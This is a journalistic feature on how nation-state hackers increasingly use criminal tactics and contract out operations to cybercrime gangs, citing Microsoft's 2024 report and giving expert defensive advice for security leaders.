Trouble Squared: What Happens When Nation States and Cyber Criminals Work Together?

If your security posture is solid, does it matter who is attacking you? Phil Muncaster investigates

There was a time when nation-state threats were very much the exception rather than the rule. But time moves quickly in cyberspace. A recent Netskope report claims that the majority of attributable malware-based attacks are now state-sponsored. While that may be an exaggeration, it’s certainly true that emboldened hostile nations are increasingly active in the digital realm. And they’re always on the hunt for new ways to make their campaigns more effective.

A new report from Microsoft claims that, over the past year, state-sponsored actors have been using cybercrime tactics, techniques, and procedures (TTPs) and occasionally even outsourcing their work to criminal groups. The question for CISOs is whether it really matters who attacks them if they follow industry best practices to mitigate cyber risk across the attack surface.

What Microsoft says

Microsoft’s Digital Defense Report 2024 details several ways the once distinct lines between state-sponsored threats and cybercrime are blurring. First, they’re conducting threat campaigns for financial gain. This is nothing new. North Korean actors have been targeting cryptocurrency exchanges and financial institutions for years to obtain funds for the Kim Jong-un regime and its missile programme. The UN estimates North Korean hackers have stolen over $3bn in digital currency since 2017, a third of which came last year.

“Private contractor I-Soon has been working as a de facto hacker-for-hire to do the dirty work of China’s Ministry of Public Security”

Microsoft claims that the North Korean Jade Sleet, Sapphire Sleet, and Citrine Sleet groups have been particularly prolific, and there are signs that a fourth—Moonstone Sleet—is targeting organisations with custom ransomware. In a departure from previous tactics, it says Iran is also getting in on the game. Threat actors behind the Cotton Sandstorm data-stealing campaign apparently offered to remove individual victims’ data from their repository for a fee.

The report also claims Russian state-backed threat actors are using cybercrime TTPs such as commodity malware and outsourcing some operations to criminal gangs. A group profiled as Storm-2049 (UAC-0184) reportedly compromised dozens of Ukrainian military devices in a June campaign with “no obvious cybercriminal use.” A year earlier, the Aqua Blizzard state group reportedly “handed off” access to 34 compromised Ukrainian devices to cybercrime group Storm-0593 (aka Invisimole).

“The hand-off occurred when Aqua Blizzard invoked a Powershell script that downloaded software from a Storm0593-controlled server. Storm-0593 then established command and control infrastructure and deployed Cobalt Strike beacons on most of the devices for follow-on activity,” the report notes. “This beacon was configured with the domain dashcloudew.uk, which Microsoft assesses Storm-0593 registered and used in a previous spear-phishing campaign against Ukrainian military machines last year, suggesting a pattern by Storm-0593 of supporting state intelligence collection objectives.”

Blurred lines are nothing new

These trends have been bubbling away for some time. A HP report compiled by Surrey University senior lecturer, Michael McGuire, claimed in 2021 that some nation states “are recruiting cybercriminals to act as proxies to further their interests.” It added that analysis of a sample of state-backed attacks from 2010-2020 revealed that half featured “low budget, straightforward tools” that could be bought on dark web cybercrime sites. That compares to just a fifth that featured more sophisticated homegrown malware and exploits.

However, outsourcing threat activity to third-party groups appears to be gaining traction. In February, leaked documents revealed the extent to which private contractor I-Soon has been working as a de facto hacker-for-hire to do the dirty work of China’s Ministry of Public Security.

Better together?

According to Surrey University cybersecurity professor Alan Woodward, nation-states should outsource work this way for several reasons. The most obvious is plausible deniability.

“If accused by the international community, the nation behind an attack can always say it wasn’t them. This becomes even more plausible if the attack is such that it both disrupts and makes money,” he tells Assured Intelligence. “In the past, attacks tended to be motivated by one or the other, but ransomware, for example, has evolved to the point where it takes services down for weeks and potentially brings in money, which can be distributed via money mules into hard currency.”

“If you do manage to track the attacks back to source, it is usually some bulletproof host and nothing to do with a particular nation”Professor Alan Woodward

Woodward says that using criminal TTPs like ransomware-as-a-service also means that even if a government launches an attack, it will simply look as if it were carried out by a criminal entity, as it will be using the same infrastructure.

“If you manage to track the attacks back to the source, it is usually some bulletproof host and nothing to do with a particular nation,” he adds. “It’s easier than ever to remotely engage criminals to conduct attacks – in fact, some crime gangs may never have met each other, never mind the state commissioning them. You can be anyone you like online.”

In many ways, it’s a continuation of a trend fomented during the Cold War, where governments on either side of the Iron Curtain used mercenaries as proxies to do their bidding in a way that helped them avoid diplomatic pressure, Woodward explains.

Focus on the basics first

Should CISOs be concerned? Such tactics are certainly helping nation-states expand their operations and arguably victimise a growing number of blameless non-government entities. But there’s also an argument for saying this won’t change much from a risk management perspective.

“The one bonus of states using crime as a service is that it tends to be malware that has been seen before. So, CISOs should look to the main threat analysis, construct their defences accordingly, and not be overly worried about nation-state attacks which might use something they’ve not prepared for,” argues Woodward.

“Having said that, one tactic is to use crime-as-a-service attacks as a diversion and use the really sophisticated attack to penetrate a high-value target. As a CISO dealing with an attack, you might ask yourself what else this attack might cover. Even common DDoS attacks were used this way.”

Getting the basics right is the best course of action, says Woodward.

“The vast majority of successful attacks are still achieved through social engineering. Basics like multi-factor authentication (MFA) can go a long way to stymy attackers. Plus, of course, education. Have your users practice your ABC: assume nothing, believe no one and check everything,” he advises.

“CISOs also need to understand their truly valuable data assets and pay particular attention to them – including the possibility of a minor breach being used to move from less well-guarded to highly guarded areas. Partition your network and don’t allow universal access. States looking to steal IP are very good at getting through the castle gate and feeling their way around the network until they access the keep holding your Crown Jewels.”

“Have your users practice your ABC: assume nothing, believe no one and check everything” Professor Alan Woodward

Netskope’s EMEA CISO, Neil Thacker, agrees that best practice cyber hygiene is an excellent first step but adds that it is insufficient alone.

“With an understanding of who might be targeting your organisation, you can then build a resilient infrastructure that provides visibility over data flows, can identify and block threats, and minimise downtime in the event of a cyber attack,” he tells Assured Intelligence.

“Develop a roadmap for advanced security controls. Consider threat modelling, anomaly detection, continuous monitoring, and behavioural detection to identify suspicious data movements across cloud environments.”

Thacker adds that such efforts must be accompanied by continuous refinement and adaptation, which is where understanding specific attackers and their TTPs can be helpful.

“Regularly evaluate the effectiveness of your security measures. Adapt and refine them based on real-world experiences and emerging threats. Stay on top of the latest security threat data and trends and adapt security measures accordingly,” he concludes.

With a flexible approach that responds to changing threat landscape trends, CISOs can be more confident that their defensive efforts will pass muster. Ultimately, it means that, regardless of who is behind the latest assault, the risk can be effectively neutralised.